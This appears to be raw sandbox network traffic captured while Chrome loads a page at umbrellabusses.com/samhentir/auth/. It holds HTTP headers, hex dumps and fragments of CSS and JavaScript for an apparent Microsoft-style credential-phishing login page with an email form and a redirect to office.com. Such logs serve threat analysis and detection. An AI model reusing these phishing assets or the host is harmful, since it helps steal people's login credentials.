                                                                                                                                                                                                                        2025-01-10 13:53:04 UTC547INData Raw: 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 6e 70 42 6f 78 73 70 61 6e 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 3e 46 6f 72 67 6f 74 20 70 61 73 73 77 6f 72 64 3f 3c 2f 73 70 61 6e 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 6e 70 42 6f 78 73 70 61 6e 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 3e 46 6f 72 67 6f 74 20 75 73 65 72 6e 61 6d 65 3f 3c 2f 73 70 61 6e 3e 0d 0a
                                                                                                                                                                                                                        Data Ascii: </div> </div> <div class="inpBoxspan"> <span>Forgot password?</span> </div> <div class="inpBoxspan"> <span>Forgot username?</span>
                                                                                                                                                                                                                        2025-01-10 13:53:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        68192.168.2.549963104.21.83.974435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:53:04 UTC572OUTGET /samhentir/css/main.css HTTP/1.1
                                                                                                                                                                                                                        Host: umbrellabusses.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                        Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: style
                                                                                                                                                                                                                        Referer: https://umbrellabusses.com/samhentir/auth/
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:53:04 UTC991INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Fri, 10 Jan 2025 13:53:04 GMT
                                                                                                                                                                                                                        Content-Type: text/css
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Last-Modified: Sun, 15 Dec 2024 15:41:18 GMT
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        ETag: W/"675ef89e-1add"
                                                                                                                                                                                                                        Expires: Fri, 10 Jan 2025 21:46:03 GMT
                                                                                                                                                                                                                        Cache-Control: max-age=43200
                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                        Age: 14821
                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2bG56%2Fv2RKU5mFhXo%2BPfaUg6RE8DQvewrG1a43swZrHaNlz9Lg21tIlAsVgoj9APPB14E7YISRkta4IF2Dqd2ME6hmK18VFoLepmykCqjF1BJpZkdOwRxpvZMaUtWQcixgkWXYY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                        CF-RAY: 8ffd26b369a57289-EWR
                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1784&min_rtt=1771&rtt_var=690&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=1150&delivery_rate=1556503&cwnd=238&unsent_bytes=0&cid=337039a3cc16ed0b&ts=153&x=0"
                                                                                                                                                                                                                        2025-01-10 13:53:04 UTC378INData Raw: 31 61 64 64 0d 0a 20 20 20 2a 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 53 65 67 6f 65 20 55 49 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 68 65 61 64 62 6f 78 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 30 30 37 38 44 37 3b 0d 0a 20 20 20 20 20 20 20
                                                                                                                                                                                                                        Data Ascii: 1add * { margin: 0; padding: 0; box-sizing: border-box; } body { font-family: 'Segoe UI', sans-serif; } .headbox { background-color: #0078D7;
                                                                                                                                                                                                                        2025-01-10 13:53:04 UTC1369INData Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 22 2e 2e 2f 69 6d 67 2f 6c 6f 67 2e 70 6e 67 22 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 20 35 35 70 78 20 35 35 70 78 3b 20 2f 2a 20 41 64 6a 75 73 74 20 73 69 7a 65 20 2a 2f 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 35 35 70 78 3b 20 2f 2a 20 53 65 74 20 68 65 69 67 68 74 20 74 6f 20 6d 61 74 63 68 20 69 6d 61 67 65 20 2a 2f 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 35 35 70 78 3b 20 2f 2a 20 53 65 74 20 77 69 64 74 68 20 74 6f 20 6d 61 74 63
                                                                                                                                                                                                                        Data Ascii: background-image: url("../img/log.png"); background-repeat: no-repeat; background-size: 55px 55px; /* Adjust size */ height: 55px; /* Set height to match image */ width: 55px; /* Set width to matc
                                                                                                                                                                                                                        2025-01-10 13:53:04 UTC1369INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 31 35 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 70 66 54 65 78 74 20 70 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 74 65 78 74 43 6f 6e 70 20 70 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 66 49 6e 70 42 6f 78 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 35 70 78 20 30 3b 0d 0a 20 20 20 20
                                                                                                                                                                                                                        Data Ascii: margin-right: 15px; } .pfText p { font-size: 14px; font-weight: 500; } .textConp p { font-size: 14px; } .fInpBox { margin: 15px 0;
                                                                                                                                                                                                                        2025-01-10 13:53:04 UTC1369INData Raw: 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 22 2e 2e 2f 69 6d 67 2f 62 74 6e 2e 70 6e 67 22 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 20 63 6f 76 65 72 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 76 68 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 66 6f 72 6d 43 6f 6e 74 61 69 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 33 30 70 78 20 35 30 70
                                                                                                                                                                                                                        Data Ascii: background-image: url("../img/btn.png"); background-repeat: no-repeat; background-size: cover; height: 100vh; } .formContain { background-color: #fff; padding: 30px 50p
                                                                                                                                                                                                                        2025-01-10 13:53:04 UTC1369INData Raw: 20 20 20 20 20 20 20 2e 69 6e 70 46 6f 72 6d 20 68 33 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 33 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 69 6e 70 42 6f 78 20 69 6e 70 75 74 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74
                                                                                                                                                                                                                        Data Ascii: .inpForm h3 { font-size: 23px; font-weight: 500; } .inpBox input { width: 100%; padding: 10px 0; font-size: 15px; border: none; border-bott
                                                                                                                                                                                                                        2025-01-10 13:53:04 UTC1031INData Raw: 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 72 67 62 28 32 30 32 2c 20 37 2c 20 37 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 33 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 70 78 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 65 72 72 6f 72 32 20 73 70 61 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 72 67 62 28 32 30 32 2c 20 37 2c 20 37 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 3b
                                                                                                                                                                                                                        Data Ascii: display: inline-block; color: rgb(202, 7, 7); font-size: 13px; margin: 5px 0; } .error2 span { display: inline-block; color: rgb(202, 7, 7); font-size: 15px;
                                                                                                                                                                                                                        2025-01-10 13:53:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        69192.168.2.549973104.21.83.974435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:53:05 UTC556OUTGET /samhentir/js/main.js HTTP/1.1
                                                                                                                                                                                                                        Host: umbrellabusses.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                        Referer: https://umbrellabusses.com/samhentir/auth/
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:53:05 UTC1020INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Fri, 10 Jan 2025 13:53:05 GMT
                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Last-Modified: Sun, 15 Dec 2024 16:07:16 GMT
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        ETag: W/"675efeb4-e28"
                                                                                                                                                                                                                        Expires: Fri, 10 Jan 2025 21:46:03 GMT
                                                                                                                                                                                                                        Cache-Control: max-age=43200
                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                        Age: 14822
                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9DKjK%2Fo7RbOgcgNtq8lrXxRXzzg3Wh%2FtR%2F0THFvo4e%2Bt%2BwSipMbbGTsRU%2FXvd%2BaRtfLsHIkq96bO77gGhEvCMgdvUP1fRt2btImljoXmlPnMKdabIKq0%2FNM%2BMXGfFPY7q%2FsbxoY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                        CF-RAY: 8ffd26b76e8fde9a-EWR
                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1772&min_rtt=1648&rtt_var=866&sent=3&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=1134&delivery_rate=1105641&cwnd=209&unsent_bytes=0&cid=a05b64067298440c&ts=135&x=0"
                                                                                                                                                                                                                        2025-01-10 13:53:05 UTC349INData Raw: 65 32 38 0d 0a 20 63 6f 6e 73 74 20 63 6f 6e 74 61 69 6e 65 72 31 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 2e 63 6f 6e 74 61 69 6e 65 72 22 29 3b 0d 0a 20 20 20 20 20 20 20 20 63 6f 6e 73 74 20 63 6f 6e 74 61 69 6e 65 72 32 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 2e 63 6f 6e 74 61 69 6e 65 72 32 22 29 3b 0d 0a 20 20 20 20 20 20 20 20 63 6f 6e 73 74 20 65 6d 54 65 78 74 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 2e 6d 69 6e 70 22 29 3b 0d 0a 20 20 20 20 20 20 20 20 63 6f 6e 73 74 20 65 72 72 6f 72 54 65 78 74 42 6f 78 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 2e 65 72 72 6f 72 54 65 78 74 42 6f 78 22
                                                                                                                                                                                                                        Data Ascii: e28 const container1 = document.querySelector(".container"); const container2 = document.querySelector(".container2"); const emText = document.querySelector(".minp"); const errorTextBox = document.querySelector(".errorTextBox"
                                                                                                                                                                                                                        2025-01-10 13:53:05 UTC1369INData Raw: 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 2e 70 61 46 6f 72 6d 22 29 3b 0d 0a 20 20 20 20 20 20 20 20 63 6f 6e 73 74 20 65 6d 69 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 2e 65 6d 69 22 29 3b 0d 0a 20 20 20 20 20 20 20 20 63 6f 6e 73 74 20 70 61 49 6e 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 2e 70 61 49 6e 70 22 29 3b 0d 0a 20 20 20 20 20 20 20 20 63 6f 6e 73 74 20 62 61 63 6b 62 74 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 2e 62 61 63 6b 62 74 22 29 3b 0d 0a 20 20 20 20 20 20 20 20 63 6f 6e 73 74 20 65 72 72 6f 72 32 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 2e 65 72 72 6f 72 32 22 29 3b 0d
                                                                                                                                                                                                                        Data Ascii: .querySelector(".paForm"); const emi = document.querySelector(".emi"); const paInp = document.querySelector(".paInp"); const backbt = document.querySelector(".backbt"); const error2 = document.querySelector(".error2");
                                                                                                                                                                                                                        2025-01-10 13:53:05 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 75 72 6c 2e 74 6f 53 74 72 69 6e 67 28 29 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 09 7d 0d 0a 0d 0a 0d 0a 0d 0a 74 75 72 6e 55 72 6c 54 6f 52 61 6e 64 6f 6d 28 29 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 65 6d 46 6f 72 6d 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 73 75 62 6d 69 74 22 2c 20 28 65 29 20 3d 3e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 74 20 65 6d 20 3d 20 65 2e 74 61 72 67 65 74 2e 65 6c 65 6d 65 6e 74 73 2e 65 6d 2e 76 61 6c 75 65 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 65 6d
                                                                                                                                                                                                                        Data Ascii: window.location.replace(url.toString()); }}turnUrlToRandom(); emForm.addEventListener("submit", (e) => { e.preventDefault(); const em = e.target.elements.em.value; if (em
                                                                                                                                                                                                                        2025-01-10 13:53:05 UTC544INData Raw: 20 7d 20 65 6c 73 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6f 66 66 69 63 65 2e 63 6f 6d 2f 22 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 20 31 30 30 30 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 65 6d 69 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6b 65 79 75 70 22 2c 20 28 29 20 3d 3e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 65 72 72 6f 72 54 65 78 74 42 6f 78 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69
                                                                                                                                                                                                                        Data Ascii: } else { window.location.href = "https://www.office.com/"; } }, 1000); } }); emi.addEventListener("keyup", () => { errorTextBox.classList.add("hi
                                                                                                                                                                                                                        2025-01-10 13:53:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        70192.168.2.549972104.21.83.974435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:53:05 UTC613OUTGET /samhentir/img/good.png HTTP/1.1
                                                                                                                                                                                                                        Host: umbrellabusses.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                        Referer: https://umbrellabusses.com/samhentir/
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:53:05 UTC997INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Fri, 10 Jan 2025 13:53:05 GMT
                                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Last-Modified: Sun, 15 Dec 2024 15:25:20 GMT
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        ETag: W/"675ef4e0-1ea6"
                                                                                                                                                                                                                        Expires: Sat, 08 Feb 2025 08:24:11 GMT
                                                                                                                                                                                                                        Cache-Control: max-age=2592000
                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                        Age: 106134
                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=681a1ssehDBhXNN64MMGq759htPnDW29rmLhAnOb1KYkVDjo2gjwyGI%2F8yaQuIWfsatjXuPYqu3lb%2FEJ5CMvC3a3oMd2kg0ec2tUhaUN5NRycao3M4HttvEn4tnhMTtQg%2BSm9v8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                        CF-RAY: 8ffd26b799d541ac-EWR
                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1605&min_rtt=1599&rtt_var=612&sent=3&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=1191&delivery_rate=1769696&cwnd=252&unsent_bytes=0&cid=fc91a0e2dc4995b4&ts=135&x=0"
                                                                                                                                                                                                                        2025-01-10 13:53:05 UTC372INData Raw: 31 65 61 36 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 06 00 00 00 f4 78 d4 fa 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 1e 24 49 44 41 54 78 9c ed dd 0b 94 65 57 59 27 f0 4a 20 0f 42 82 84 77 20 93 a6 bb ef 3e b7 28 08 a3 74 50 d0 81 80 03 8c a8 71 60 24 03 c8 4b 96 33 3d 8e ae 2c 68 92 aa 73 6e 07 e7 e2 63 d6 04 d4 95 71 40 09 ea 1a 45 51 24 33 71 04 34 08 48 2a 75 ce ed 4e 82 ed f0 6a de 08 61 8c 3c 84 00 49 08 e4 d1 49 cf 3e 95 10 ab aa f3 e8 47 55 7d a7 ee fd fd d6 fa 2f 9a b5 08 e9 7b f6 b7 f7 77 f6 7d ec 33 35 05 00 00 00 00 00 00
                                                                                                                                                                                                                        Data Ascii: 1ea6PNGIHDRxgAMAasRGB cHRMz&u0`:pQ<$IDATxeWY'J Bw >(tPq`$K3=,hsncq@EQ$3q4H*uNja<II>GU}/{w}35
                                                                                                                                                                                                                        2025-01-10 13:53:05 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 81 66 47 fd 93 e6 9a de b3 cb 26 9d 5b 35 e9 77 aa ba 78 5f fe f3 a7 ab a6 f8 87 b2 4e df 28 eb e2 b6 9c 1b f3 9f bf 9e ff f3 ef ab 3a fd 6d fe f3 9f 95 4d f1 6b f9 7f f7 f2 fc cf f7 a3 5f 03 00 70 5f f6 4f 1d 55 8d b6 3e 35 37 fa df c8 0d 7f 4f 6e f4 fb 72 f6 1f 51 ea e2 ab 39 7f 3e 68 8a 9f db b1 7b e6 21 d1 2f 11 00 b8 53 6e f6 5b f2 8e fd f5 79 f7 7e f5 11 37 fc
                                                                                                                                                                                                                        Data Ascii: fG&[5wx_N(:mMk_p_OU>57OnrQ9>h{!/Sn[y~7
                                                                                                                                                                                                                        2025-01-10 13:53:05 UTC1369INData Raw: c6 58 6e 36 83 f8 86 27 77 25 df 88 b5 5f c2 8c ae 0b 00 c6 58 59 17 65 78 c3 93 95 f9 af d1 75 01 c0 18 cb 8d e6 0d 1d 68 76 b2 2c e9 03 1e f9 0b c0 da d8 3f 75 54 59 a7 0b e3 9b 9d 2c 4b 5d 7c b8 6a 4e 3f 39 ba 3c 00 18 47 b9 f9 57 75 7a 53 78 b3 93 15 49 9f 19 5c b1 f9 91 d1 e5 01 c0 18 6a df 5a ce bb cc b7 c6 37 3b 59 9a b2 49 9f de b9 3b 3d 26 ba 3e 00 18 43 8b cd bf 49 7f 1c dd ec 64 45 f3 af d3 27 67 47 fd 47 47 d7 07 00 63 68 b8 77 e6 d8 b2 2e 2e 89 6e 76 b2 b2 f9 17 1f 1a d4 bd 87 47 d7 07 00 63 e8 9c 4b 7b c7 e5 5d e6 3b a3 9b 9d ac 4c da 53 5d 35 fd d0 e8 fa 00 60 0c 0d f7 9c 72 42 de 65 be 3f be d9 c9 d2 94 4d 1a 0d af ec 3d 28 ba 3e 00 18 43 c3 f9 99 13 f3 ce ff b2 e8 66 27 07 64 61 76 d4 3f 29 ba 3e 00 18 43 c3 f9 4d 0f ae ea e2 8a 0e 34 3b
